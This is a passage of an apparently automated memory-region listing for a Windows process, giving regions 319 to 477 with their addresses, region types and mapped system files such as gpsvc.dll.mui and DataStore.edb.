name = "private_0x0000001c8bed0000"
filename = ""
Region:
id = 319
start_va = 0x1c8bee0000
end_va = 0x1c8beecfff
entry_point = 0x1c8bee0000
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 320
start_va = 0x1c8bef0000
end_va = 0x1c8bef3fff
entry_point = 0x1c8bef0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 321
start_va = 0x1c8bf00000
end_va = 0x1c8bffffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bf00000"
filename = ""
Region:
id = 322
start_va = 0x1c8c000000
end_va = 0x1c8c187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c000000"
filename = ""
Region:
id = 323
start_va = 0x1c8c190000
end_va = 0x1c8c310fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c190000"
filename = ""
Region:
id = 324
start_va = 0x1c8c320000
end_va = 0x1c8c41ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c320000"
filename = ""
Region:
id = 325
start_va = 0x1c8c420000
end_va = 0x1c8c49ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c420000"
filename = ""
Region:
id = 326
start_va = 0x1c8c4a0000
end_va = 0x1c8c4a3fff
entry_point = 0x1c8c4a0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 327
start_va = 0x1c8c4b0000
end_va = 0x1c8c4b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c4b0000"
filename = ""
Region:
id = 328
start_va = 0x1c8c4c0000
end_va = 0x1c8c4d0fff
entry_point = 0x1c8c4c0000
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 329
start_va = 0x1c8c4e0000
end_va = 0x1c8c4e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8c4e0000"
filename = ""
Region:
id = 330
start_va = 0x1c8c4f0000
end_va = 0x1c8c4f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c4f0000"
filename = ""
Region:
id = 331
start_va = 0x1c8c500000
end_va = 0x1c8c5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c500000"
filename = ""
Region:
id = 332
start_va = 0x1c8c600000
end_va = 0x1c8c936fff
entry_point = 0x1c8c600000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 333
start_va = 0x1c8c940000
end_va = 0x1c8ca3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8c940000"
filename = ""
Region:
id = 334
start_va = 0x1c8ca40000
end_va = 0x1c8cb3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ca40000"
filename = ""
Region:
id = 335
start_va = 0x1c8cb40000
end_va = 0x1c8cc3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cb40000"
filename = ""
Region:
id = 336
start_va = 0x1c8cc40000
end_va = 0x1c8cd3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cc40000"
filename = ""
Region:
id = 337
start_va = 0x1c8cd40000
end_va = 0x1c8cdbffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cd40000"
filename = ""
Region:
id = 338
start_va = 0x1c8cdc0000
end_va = 0x1c8cdc0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8cdc0000"
filename = ""
Region:
id = 339
start_va = 0x1c8cdd0000
end_va = 0x1c8cdd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8cdd0000"
filename = ""
Region:
id = 340
start_va = 0x1c8cde0000
end_va = 0x1c8cde1fff
entry_point = 0x1c8cde0000
region_type = mapped_file
name = "activeds.dll.mui"
filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")
Region:
id = 341
start_va = 0x1c8cdf0000
end_va = 0x1c8cdf6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cdf0000"
filename = ""
Region:
id = 342
start_va = 0x1c8ce00000
end_va = 0x1c8cefffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ce00000"
filename = ""
Region:
id = 343
start_va = 0x1c8cf00000
end_va = 0x1c8cffffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8cf00000"
filename = ""
Region:
id = 344
start_va = 0x1c8d000000
end_va = 0x1c8d0fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d000000"
filename = ""
Region:
id = 345
start_va = 0x1c8d100000
end_va = 0x1c8d1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d100000"
filename = ""
Region:
id = 346
start_va = 0x1c8d200000
end_va = 0x1c8d2fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d200000"
filename = ""
Region:
id = 347
start_va = 0x1c8d300000
end_va = 0x1c8d3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d300000"
filename = ""
Region:
id = 348
start_va = 0x1c8d400000
end_va = 0x1c8d47ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d400000"
filename = ""
Region:
id = 349
start_va = 0x1c8d480000
end_va = 0x1c8d4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d480000"
filename = ""
Region:
id = 350
start_va = 0x1c8d500000
end_va = 0x1c8d57ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d500000"
filename = ""
Region:
id = 351
start_va = 0x1c8d580000
end_va = 0x1c8d5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d580000"
filename = ""
Region:
id = 352
start_va = 0x1c8d600000
end_va = 0x1c8d6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d600000"
filename = ""
Region:
id = 353
start_va = 0x1c8d700000
end_va = 0x1c8d7fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d700000"
filename = ""
Region:
id = 354
start_va = 0x1c8d800000
end_va = 0x1c8d842fff
entry_point = 0x1c8d800000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000007.db")
Region:
id = 355
start_va = 0x1c8d850000
end_va = 0x1c8d8dafff
entry_point = 0x1c8d850000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 356
start_va = 0x1c8d8e0000
end_va = 0x1c8d95ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d8e0000"
filename = ""
Region:
id = 357
start_va = 0x1c8d960000
end_va = 0x1c8da5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8d960000"
filename = ""
Region:
id = 358
start_va = 0x1c8da60000
end_va = 0x1c8db5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8da60000"
filename = ""
Region:
id = 359
start_va = 0x1c8db60000
end_va = 0x1c8db77fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8db60000"
filename = ""
Region:
id = 360
start_va = 0x1c8db80000
end_va = 0x1c8db8ffff
entry_point = 0x1c8db80000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 361
start_va = 0x1c8db90000
end_va = 0x1c8db91fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8db90000"
filename = ""
Region:
id = 362
start_va = 0x1c8dba0000
end_va = 0x1c8dba0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dba0000"
filename = ""
Region:
id = 363
start_va = 0x1c8dbb0000
end_va = 0x1c8dbb1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8dbb0000"
filename = ""
Region:
id = 364
start_va = 0x1c8dbc0000
end_va = 0x1c8dbc6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dbc0000"
filename = ""
Region:
id = 365
start_va = 0x1c8dbd0000
end_va = 0x1c8dbd6fff
entry_point = 0x1c8dbd0000
region_type = mapped_file
name = "newdev.dll.mui"
filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui")
Region:
id = 366
start_va = 0x1c8dbe0000
end_va = 0x1c8dcdffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dbe0000"
filename = ""
Region:
id = 367
start_va = 0x1c8dce0000
end_va = 0x1c8dddffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dce0000"
filename = ""
Region:
id = 368
start_va = 0x1c8dde0000
end_va = 0x1c8dedffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8dde0000"
filename = ""
Region:
id = 369
start_va = 0x1c8dee0000
end_va = 0x1c8dee0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8dee0000"
filename = ""
Region:
id = 370
start_va = 0x1c8def0000
end_va = 0x1c8def0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8def0000"
filename = ""
Region:
id = 371
start_va = 0x1c8df00000
end_va = 0x1c8df08fff
entry_point = 0x1c8df00000
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 372
start_va = 0x1c8df10000
end_va = 0x1c8df10fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8df10000"
filename = ""
Region:
id = 373
start_va = 0x1c8df20000
end_va = 0x1c8e01ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8df20000"
filename = ""
Region:
id = 374
start_va = 0x1c8e020000
end_va = 0x1c8e09ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e020000"
filename = ""
Region:
id = 375
start_va = 0x1c8e0a0000
end_va = 0x1c8e0e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e0a0000"
filename = ""
Region:
id = 376
start_va = 0x1c8e0f0000
end_va = 0x1c8e0f7fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e0f0000"
filename = ""
Region:
id = 377
start_va = 0x1c8e100000
end_va = 0x1c8e1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e100000"
filename = ""
Region:
id = 378
start_va = 0x1c8e200000
end_va = 0x1c8e2fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e200000"
filename = ""
Region:
id = 379
start_va = 0x1c8e300000
end_va = 0x1c8e3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e300000"
filename = ""
Region:
id = 380
start_va = 0x1c8e400000
end_va = 0x1c8e4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e400000"
filename = ""
Region:
id = 381
start_va = 0x1c8e500000
end_va = 0x1c8e57ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e500000"
filename = ""
Region:
id = 382
start_va = 0x1c8e580000
end_va = 0x1c8e5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e580000"
filename = ""
Region:
id = 383
start_va = 0x1c8e600000
end_va = 0x1c8e67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e600000"
filename = ""
Region:
id = 384
start_va = 0x1c8e680000
end_va = 0x1c8e6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e680000"
filename = ""
Region:
id = 385
start_va = 0x1c8e700000
end_va = 0x1c8e7fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e700000"
filename = ""
Region:
id = 386
start_va = 0x1c8e800000
end_va = 0x1c8e8fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e800000"
filename = ""
Region:
id = 387
start_va = 0x1c8e900000
end_va = 0x1c8e9defff
entry_point = 0x1c8e900000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 388
start_va = 0x1c8e9e0000
end_va = 0x1c8eadffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8e9e0000"
filename = ""
Region:
id = 389
start_va = 0x1c8eae0000
end_va = 0x1c8ebdffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8eae0000"
filename = ""
Region:
id = 390
start_va = 0x1c8ebe0000
end_va = 0x1c8ecdffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ebe0000"
filename = ""
Region:
id = 391
start_va = 0x1c8ece0000
end_va = 0x1c8eddffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ece0000"
filename = ""
Region:
id = 392
start_va = 0x1c8ede0000
end_va = 0x1c8eedffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ede0000"
filename = ""
Region:
id = 393
start_va = 0x1c8eee0000
end_va = 0x1c8efdffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8eee0000"
filename = ""
Region:
id = 394
start_va = 0x1c8efe0000
end_va = 0x1c8f0dffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8efe0000"
filename = ""
Region:
id = 395
start_va = 0x1c8f0e0000
end_va = 0x1c8f1dffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f0e0000"
filename = ""
Region:
id = 396
start_va = 0x1c8f1e0000
end_va = 0x1c8f25ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f1e0000"
filename = ""
Region:
id = 397
start_va = 0x1c8f260000
end_va = 0x1c8f35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f260000"
filename = ""
Region:
id = 398
start_va = 0x1c8f360000
end_va = 0x1c8f45ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f360000"
filename = ""
Region:
id = 399
start_va = 0x1c8f460000
end_va = 0x1c8f55ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f460000"
filename = ""
Region:
id = 400
start_va = 0x1c8f560000
end_va = 0x1c8f65ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f560000"
filename = ""
Region:
id = 401
start_va = 0x1c8f660000
end_va = 0x1c8f75ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f660000"
filename = ""
Region:
id = 402
start_va = 0x1c8f760000
end_va = 0x1c8f85ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f760000"
filename = ""
Region:
id = 403
start_va = 0x1c8f860000
end_va = 0x1c8f95ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f860000"
filename = ""
Region:
id = 404
start_va = 0x1c8f960000
end_va = 0x1c8f96ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8f960000"
filename = ""
Region:
id = 405
start_va = 0x1c8f970000
end_va = 0x1c8f97ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8f970000"
filename = ""
Region:
id = 406
start_va = 0x1c8f980000
end_va = 0x1c8f98ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8f980000"
filename = ""
Region:
id = 407
start_va = 0x1c8f990000
end_va = 0x1c8f99ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8f990000"
filename = ""
Region:
id = 408
start_va = 0x1c8f9a0000
end_va = 0x1c8f9affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8f9a0000"
filename = ""
Region:
id = 409
start_va = 0x1c8f9b0000
end_va = 0x1c8f9bffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8f9b0000"
filename = ""
Region:
id = 410
start_va = 0x1c8f9c0000
end_va = 0x1c8f9cffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f9c0000"
filename = ""
Region:
id = 411
start_va = 0x1c8f9d0000
end_va = 0x1c8f9dffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f9d0000"
filename = ""
Region:
id = 412
start_va = 0x1c8f9e0000
end_va = 0x1c8f9e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f9e0000"
filename = ""
Region:
id = 413
start_va = 0x1c8f9f0000
end_va = 0x1c8f9f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8f9f0000"
filename = ""
Region:
id = 414
start_va = 0x1c8fa00000
end_va = 0x1c8fafffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fa00000"
filename = ""
Region:
id = 415
start_va = 0x1c8fb00000
end_va = 0x1c8fbfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fb00000"
filename = ""
Region:
id = 416
start_va = 0x1c8fc00000
end_va = 0x1c8fcfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fc00000"
filename = ""
Region:
id = 417
start_va = 0x1c8fd00000
end_va = 0x1c8fdfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fd00000"
filename = ""
Region:
id = 418
start_va = 0x1c8fe00000
end_va = 0x1c8fe7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fe00000"
filename = ""
Region:
id = 419
start_va = 0x1c8fe80000
end_va = 0x1c8fe8ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8fe80000"
filename = ""
Region:
id = 420
start_va = 0x1c8fe90000
end_va = 0x1c8fe9ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8fe90000"
filename = ""
Region:
id = 421
start_va = 0x1c8fea0000
end_va = 0x1c8feaffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8fea0000"
filename = ""
Region:
id = 422
start_va = 0x1c8feb0000
end_va = 0x1c8febffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8feb0000"
filename = ""
Region:
id = 423
start_va = 0x1c8fec0000
end_va = 0x1c8fecffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8fec0000"
filename = ""
Region:
id = 424
start_va = 0x1c8fed0000
end_va = 0x1c8fedffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8fed0000"
filename = ""
Region:
id = 425
start_va = 0x1c8fee0000
end_va = 0x1c8fee6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fee0000"
filename = ""
Region:
id = 426
start_va = 0x1c8fef0000
end_va = 0x1c8ffeffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fef0000"
filename = ""
Region:
id = 427
start_va = 0x1c8fff0000
end_va = 0x1c8fff0fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8fff0000"
filename = ""
Region:
id = 428
start_va = 0x1c90000000
end_va = 0x1c900fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90000000"
filename = ""
Region:
id = 429
start_va = 0x1c90100000
end_va = 0x1c9017ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90100000"
filename = ""
Region:
id = 430
start_va = 0x1c90200000
end_va = 0x1c9020ffff
entry_point = 0x1c90200000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 431
start_va = 0x1c90210000
end_va = 0x1c9021ffff
entry_point = 0x1c90210000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 432
start_va = 0x1c90220000
end_va = 0x1c9022ffff
entry_point = 0x1c90220000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 433
start_va = 0x1c90230000
end_va = 0x1c9023ffff
entry_point = 0x1c90230000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 434
start_va = 0x1c90240000
end_va = 0x1c9024ffff
entry_point = 0x1c90240000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 435
start_va = 0x1c90250000
end_va = 0x1c9025ffff
entry_point = 0x1c90250000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 436
start_va = 0x1c90260000
end_va = 0x1c9026ffff
entry_point = 0x1c90260000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 437
start_va = 0x1c90270000
end_va = 0x1c9027ffff
entry_point = 0x1c90270000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 438
start_va = 0x1c90280000
end_va = 0x1c9028ffff
entry_point = 0x1c90280000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 439
start_va = 0x1c90290000
end_va = 0x1c9029ffff
entry_point = 0x1c90290000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 440
start_va = 0x1c902a0000
end_va = 0x1c902affff
entry_point = 0x1c902a0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 441
start_va = 0x1c902b0000
end_va = 0x1c902bffff
entry_point = 0x1c902b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 442
start_va = 0x1c902c0000
end_va = 0x1c902cffff
entry_point = 0x1c902c0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 443
start_va = 0x1c902d0000
end_va = 0x1c902dffff
entry_point = 0x1c902d0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 444
start_va = 0x1c902e0000
end_va = 0x1c902effff
entry_point = 0x1c902e0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 445
start_va = 0x1c902f0000
end_va = 0x1c902fffff
entry_point = 0x1c902f0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 446
start_va = 0x1c90300000
end_va = 0x1c903fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90300000"
filename = ""
Region:
id = 447
start_va = 0x1c90400000
end_va = 0x1c904fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90400000"
filename = ""
Region:
id = 448
start_va = 0x1c90500000
end_va = 0x1c905fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90500000"
filename = ""
Region:
id = 449
start_va = 0x1c90600000
end_va = 0x1c906fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90600000"
filename = ""
Region:
id = 450
start_va = 0x1c90700000
end_va = 0x1c907fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90700000"
filename = ""
Region:
id = 451
start_va = 0x1c90800000
end_va = 0x1c90803fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90800000"
filename = ""
Region:
id = 452
start_va = 0x1c90810000
end_va = 0x1c90811fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90810000"
filename = ""
Region:
id = 453
start_va = 0x1c90820000
end_va = 0x1c90820fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90820000"
filename = ""
Region:
id = 454
start_va = 0x1c90830000
end_va = 0x1c90836fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90830000"
filename = ""
Region:
id = 455
start_va = 0x1c90840000
end_va = 0x1c9088cfff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c90840000"
filename = ""
Region:
id = 456
start_va = 0x1c90890000
end_va = 0x1c908dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90890000"
filename = ""
Region:
id = 457
start_va = 0x1c908e0000
end_va = 0x1c908effff
entry_point = 0x0
region_type = private
name = "private_0x0000001c908e0000"
filename = ""
Region:
id = 458
start_va = 0x1c908f0000
end_va = 0x1c908f7fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c908f0000"
filename = ""
Region:
id = 459
start_va = 0x1c90900000
end_va = 0x1c909fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90900000"
filename = ""
Region:
id = 460
start_va = 0x1c90a00000
end_va = 0x1c90afffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90a00000"
filename = ""
Region:
id = 461
start_va = 0x1c90b00000
end_va = 0x1c90bfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90b00000"
filename = ""
Region:
id = 462
start_va = 0x1c90c00000
end_va = 0x1c90cfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90c00000"
filename = ""
Region:
id = 463
start_va = 0x1c90d00000
end_va = 0x1c90dfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90d00000"
filename = ""
Region:
id = 464
start_va = 0x1c90e00000
end_va = 0x1c90efffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90e00000"
filename = ""
Region:
id = 465
start_va = 0x1c90f00000
end_va = 0x1c90ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c90f00000"
filename = ""
Region:
id = 466
start_va = 0x1c91000000
end_va = 0x1c910fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c91000000"
filename = ""
Region:
id = 467
start_va = 0x1c91100000
end_va = 0x1c911fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c91100000"
filename = ""
Region:
id = 468
start_va = 0x1c91200000
end_va = 0x1c912fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c91200000"
filename = ""
Region:
id = 469
start_va = 0x1c91300000
end_va = 0x1c913fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c91300000"
filename = ""
Region:
id = 470
start_va = 0x1c91400000
end_va = 0x1c923fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c91400000"
filename = ""
Region:
id = 471
start_va = 0x1c92400000
end_va = 0x1c9242ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c92400000"
filename = ""
Region:
id = 472
start_va = 0x1c92430000
end_va = 0x1c9642ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c92430000"
filename = ""
Region:
id = 473
start_va = 0x1c96430000
end_va = 0x1c9a42ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c96430000"
filename = ""
Region:
id = 474
start_va = 0x1c9a430000
end_va = 0x1c9a43ffff
entry_point = 0x1c9a430000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 475
start_va = 0x1c9a440000
end_va = 0x1c9a44ffff
entry_point = 0x1c9a440000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 476
start_va = 0x1c9a450000
end_va = 0x1c9a45ffff
entry_point = 0x1c9a450000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 477
start_va = 0x1c9a460000
end_va = 0x1c9a46ffff
entry_point = 0x1c9a460000
